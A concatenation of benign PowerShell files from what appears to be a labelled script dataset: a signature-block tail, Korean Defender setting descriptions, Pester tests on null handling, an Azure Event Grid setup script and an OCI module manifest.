# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIGmk
# VntG52zOXLv/NQi+R81L2VbggcgyF7WWePXmGpP0MEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAU3WOGB0b/S2xhcrGF7oBBMjRJPQ8TqDYuNzz
# 1mMuiBB8q9MmTNlhWQqGiTogR531I12dKRfuPAmzLgR2ZqdbIcKn//PL/wwEb44l
# rgmq1vjsM3MO0pVLdYRVex8RkUxAdwRmZJns8e5YU4aAPHAWDr+Wdjo6+3P8FPSZ
# mrlljugoQc9GJ9xaDgmJHQkRXS4ebIgcSqNqrlYsoGAl9a8Wl4fhmhriHm0UToVu
# lKSkzlyhDhFpj9QBsdNhInOul6SfW+5h8HC4WZn9Q8r7yLU7sWmXzNnkd3/jLZQR
# Moy3IBcDLSu/d5jUgON58uQNW9L8O62Dq3HQvDvfwlXR7C0f/6GCF5QwgheQBgor
# BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCDDsZaz5ImUKXByvGsXg2oc2SiSJigDmYYc
# D+Q4PCGSjgIGZxqPlhsNGBMyMDI0MTAyODExNDA0NS41MjhaMASAAgH0oIHRpIHO
# MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL
# ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046RTAwMi0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAe4F0wIwspqdpwAB
# AAAB7jANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDAeFw0yMzEyMDYxODQ1NDRaFw0yNTAzMDUxODQ1NDRaMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC+8byl16KEia8xKS4vVL7R
# EOOR7LzYCLXEtWgeqyOVlrzuEz+AoCa4tBGESjbHTXECeMOwP9TPeKaKalfTU5XS
# GjpJhpGx59fxMJoTYWPzzD0O2RAlyBmOBBmiLDXRDQJL1RtuAjvCiLulVQeiPI8V
# 7+HhTR391TbC1beSxwXfdKJqY1onjDawqDJAmtwsA/gmqXgHwF9fZWcwKSuXiZBT
# bU5fcm3bhhlRNw5d04Ld15ZWzVl/VDp/iRerGo2Is/0Wwn/a3eGOdHrvfwIbfk6l
# VqwbNQE11Oedn2uvRjKWEwerXL70OuDZ8vLzxry0yEdvQ8ky+Vfq8mfEXS907Y7r
# N/HYX6cCsC2soyXG3OwCtLA7o0/+kKJZuOrD5HUrSz3kfqgDlmWy67z8ZZPjkiDC
# 1dYW1jN77t5iSl5Wp1HKBp7JU8RiRI+vY2i1cb5X2REkw3WrNW/jbofXEs9t4bgd
# +yU8sgKn9MtVnQ65s6QG72M/yaUZG2HMI31tm9mooH29vPBO9jDMOIu0LwzUTkIW
# flgd/vEWfTNcPWEQj7fsWuSoVuJ3uBqwNmRSpmQDzSfMaIzuys0pvV1jFWqtqwwC
# caY/WXsb/axkxB/zCTdHSBUJ8Tm3i4PM9skiunXY+cSqH58jWkpHbbLA3Ofss7e+
# JbMjKmTdcjmSkb5oN8qU1wIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFBCIzT8a2dwg
# nr37xd+2v1/cdqYIMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G
# A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs
# BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0
# LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH
# AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB3ZyAva2EKOWSV
# pBnYkzX8f8GZjaOs577F9o14Anh9lKy6tS34wXoPXEyQp1v1iI7rJzZVG7rpUzna
# y2n9csfn3p6y7kYkHqtSugCGmTiiBkwhFfSByKPI08MklgvJvKTZb673yGfpFwPj
# QwZeI6EPj/OAtpYkT7IUXqMki1CRMJKgeY4wURCccIujdWRkoVv4J3q/87KE0qPQ
# mAR9fqMNxjI3ZClVxA4wiM3tNVlRbF9SgpOnjVo3P/I5p8Jd41hNSVCx/8j3qM7a
# LSKtDzOEUNs+ZtjhznmZgUd7/AWHDhwBHdL57TI9h7niZkfOZOXncYsKxG4gryTs
# hU6G6sAYpbqdME/+/g1uer7VGIHUtLq3W0Anm8lAfS9PqthskZt54JF28CHdsFq/
# 7XVBtFlxL/KgcQylJNnia+anixUG60yUDt3FMGSJI34xG9NHsz3BpqSWueGtJhQ5
# ZN0K8ju0vNVgF+Dv05sirPg0ftSKf9FVECp93o8ogF48jh8CT/B32lz1D6Truk4E
# zcw7E1OhtOMf7DHgPMWf6WOdYnf+HaSJx7ZTXCJsW5oOkM0sLitxBpSpGcj2YjnN
# znCpsEPZat0h+6d7ulRaWR5RHAUyFFQ9jRa7KWaNGdELTs+nHSlYjYeQpK5QSXji
# gdKlLQPBlX+9zOoGAJhoZfrpjq4nQDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb
# SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
# EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
# ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj
# YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy
# NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT
# B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE
# AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI
# yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo
# YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y
# aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v
# 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG
# ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS
# kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr
# bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM
# jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL
# W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF
# emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu
# rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE
# FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn
# G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW
# M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5
# Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi
# AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV
# 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js
# Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx
# MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2
# LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv
# 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn
# OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1
# bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4
# rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU
# 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF
# NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/
# HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU
# CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi
# excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm
# dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq
# ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp
# Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkUwMDItMDVF
# MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK
# AQEwBwYFKw4DAhoDFQCIo6bVNvflFxbUWCDQ3YYKy6O+k6CBgzCBgKR+MHwxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv
# c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smrGDAi
# GA8yMDI0MTAyODA2MTgwMFoYDzIwMjQxMDI5MDYxODAwWjB0MDoGCisGAQQBhFkK
# BAExLDAqMAoCBQDqyasYAgEAMAcCAQACAhINMAcCAQACAhMsMAoCBQDqyvyYAgEA
# MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI
# AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAAHjcl4rNXBxwyM5fS8nqOw6x8lf
# 1RsFqQupShcrwC+zbx/3nFA5U2pjnyqIPRnRv3+YzZWJA86L/bFfrALFHwZFiQib
# UCGunT1/7Sen3zbENCSolEjbtbHq62lXAEPeaATVETrPsonHGiwNLftMdCmo39FT
# NyrlQhHRdbBt3uFBhI9545thuGJ2/+0UmSqnPkdqfpFJFQTpQULXBp1kWqWbUOh4
# XKgSaYo4MltD4LJV2caY2i1Bat6OItzYNOIJyQHt76CRJn1pmJGtL23JryESkqvd
# MvekGpYuJDAsdSRy3PnzQRmMvOjZNt00Ur8dcXWMGrJ8g/ynoU/qpDG9BucxggQN
# MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ
# MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
# MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe4F
# 0wIwspqdpwABAAAB7jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G
# CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAakWZ49LNc+zECGmfU/OrxOumS
# KXlteUBClYZZm4xuwDCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIE9QdxSV
# hfq+Vdf+DPs+5EIkBz9oCS/OQflHkVRhfjAhMIGYMIGApH4wfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAHuBdMCMLKanacAAQAAAe4wIgQg4YrvCq7S
# HssHwwbzF6sjf+O1VKt3mZP5Sd8ekjKw0bQwDQYJKoZIhvcNAQELBQAEggIAfypc
# prz4rp/CalCjGM8pAk71LDln5a7Le3uRm/cYcVDjAJOofOu+xqOVkqIR9y8vUBp5
# 53apWWkuoSvlQ9lUFggRQrbgX3+Z2VvEjVhkoP3Kctz5Q3kPDPV/Fz+sRcICz3mU
# IcsnJShrYGhWB/DQpImHBCut7alcqZCP//ssxCo+9JPK0c6HZaKZKxJNEmI7jM9g
# iYssSM3NPD3HRBotOgFV8zdgxqXOhmCTIzjDNWqn4Df5XGO709ntNAZJG2h9T7F6
# HO/kediWABYUyo8YUsA12SV8qgqIzJMQmPptMBvE5cFOHf8ISkigOBXInzYGI41z
# GnK79oNqQX831wDoZIf7lEFuBo4eOe7jNYbxsAzwHbuIvN/KaLSDN9O8gziGVltu
# mRnoqTEWxKKbGsD24xAb/qfYMKk9YWJpq0E/jU/v9chB9j5DhG0sTneGA4M9fcpQ
# sWbG3hJ9kCjoqORXKfMw28S7oJymk1nvIvU6BKmwnY8AaVr2spFUxlQ/alXPSEL9
# +ZtVqYBzSLePEylU/wM5AzDmMx0+SDaaOgWTcm/SD6sI7+WoNQZIk/avawNZnTP+
# dpmL26bJGS0USlaTQJov37fGH7u62r0PL9PDD4fdEoo8ovr6zFMTEFE/JBydX9dq
# corprXOraTFxbXyvoC5e/KBsx+JkX8yB3uwnNxs=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_32_0.ps1
|
sample_32_0.ps1
|
%이 설정은 네트워크 보호에 대한 DNS 구문 분석을 비활성화합니다.)이 설정은 네트워크 보호에 대한 DNS TCP 구문 분석을 비활성화합니다.%이 설정은 네트워크 보호에 대한 SSH 구문 분석을 비활성화합니다.i관리자가 특정 채널(링)에서 Microsoft Defender 플랫폼 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.베타미리 보기준비됨넓은지연됨h관리자가 특정 채널(링)에서 Microsoft Defender 엔진 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.n관리자가 특정 채널(링)에서 Microsoft Defender 보안 인텔리전스 업데이트를 수신하도록 장치를 구성할 수 있도록 허용 - 고객이 점진적 릴리스 프로세스를 일부 제어할 수 있도록 합니다.A관리자가 엔진, 플랫폼 및 보안 인텔리전스 업데이트에 대한 점진적 릴리스 프로세스를 옵트아웃할 수 있도록 허용합니다.l이 설정은 RS3의 Windows 하위에서 네트워크 보호를 차단 또는 감사 모드로 구성할 수 있는지 여부를 제어합니다. false이면 EnableNetworkProtection 값이 무시됩니다.이 설정은 네트워크 보호가 Windows Server에서 데이터그램 처리를 사용하도록 허용할지 여부를 제어합니다. false이면 DisableDatagramProcessing 값이 무시되고 데이터그램 검사를 사용하지 않도록 기본값이 설정됩니다.p이 설정을 사용하면 차단 및 감사에 대한 EnableNetworkProtection 값을 존중하며 검사 모드에서는 아무 작업도 수행하지 않는 네트워크 보호용 DNS 싱크케일 기능을 사용할 수 있습니다.'이 설정은 네트워크 보호에 대한 인바운드 연결 필터링을 비활성화합니다.
|
combined_dataset/train/non-malicious/2112.ps1
|
2112.ps1
|
using namespace System.Management.Automation.Internal
Describe 'Null Representatives' -Tags 'CI' {
Context 'Comparisons with $null' {
BeforeAll {
$TestValues = @(
@{ Value = { [AutomationNull]::Value } }
@{ Value = { [DBNull]::Value } }
@{ Value = { [NullString]::Value } }
)
}
It '<Value> should be equivalent to $null (RHS: $null)' -TestCases $TestValues {
param($Value)
$Value.InvokeReturnAsIs() -eq $null | Should -BeTrue
}
It '$null should be equivalent to <Value> (LHS: $null)' -TestCases $TestValues {
param($Value)
$null -eq $Value.InvokeReturnAsIs() | Should -BeTrue
}
}
Context 'Comparisons with other null representatives' {
It 'DBNull should not be equal to NullString' {
[DBNull]::Value -eq [NullString]::Value | Should -BeFalse
[NullString]::Value -eq [DBNull]::Value | Should -BeFalse
}
}
Context 'Casting Behaviour' {
BeforeAll {
$TestValues = @(
@{ Value = { $null } }
@{ Value = { [DBNull]::Value } }
@{ Value = { [NullString]::Value } }
@{ Value = { [AutomationNull]::Value } }
)
}
It '<Value> should cast to $false' -TestCases $TestValues {
param($Value)
[bool]($Value.InvokeReturnAsIs()) | Should -BeFalse
}
It '-not <Value> should be $true' -TestCases $TestValues {
param($Value)
-not $Value.InvokeReturnAsIs() | Should -BeTrue
}
It '<Value> should be treated as $false by Where-Object' -TestCases $TestValues {
param($Value)
100 | Where-Object { $Value.InvokeReturnAsIs() } | Should -BeNullOrEmpty
}
}
Context 'Collection Comparisons' {
BeforeAll {
$NullArray = $null, $null, [DBNull]::Value, $null, $null, [NullString]::Value
}
It '<Value> should correctly filter the array and return <ExpectedCount> results' {
param($Value, $ExpectedCount)
$NullArray -eq $Value | Should -HaveCount $ExpectedCount
} -TestCases @(
@{ Value = $null; ExpectedCount = 6 }
@{ Value = [DBNull]::Value; ExpectedCount = 5 }
@{ Value = [NullString]::Value; ExpectedCount = 5 }
)
}
}
|
combined_dataset/train/non-malicious/1007.ps1
|
1007.ps1
|
$myTopic = "<your-custom-topic-name>"
$myEndpoint = "<your-endpoint-URL>"
$myResourceGroup = "<resource-group-name>"
New-AzResourceGroup -Name $myResourceGroup -Location westus2
$topicID = (New-AzEventGridTopic -ResourceGroupName $myResourceGroup -Name $myTopic -Location westus2).Id
New-AzEventGridSubscription `
-ResourceId $topicID `
-EventSubscriptionName demoSubscription `
-Endpoint $myEndpoint
|
combined_dataset/train/non-malicious/sample_25_81.ps1
|
sample_25_81.ps1
|
#
# Module manifest for module 'OCI.PSModules.Dataintegration'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Dataintegration.dll'
# Version number of this module.
ModuleVersion = '83.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '769e2e00-1fe3-46af-a9e9-c24a01403239'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Dataintegration Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
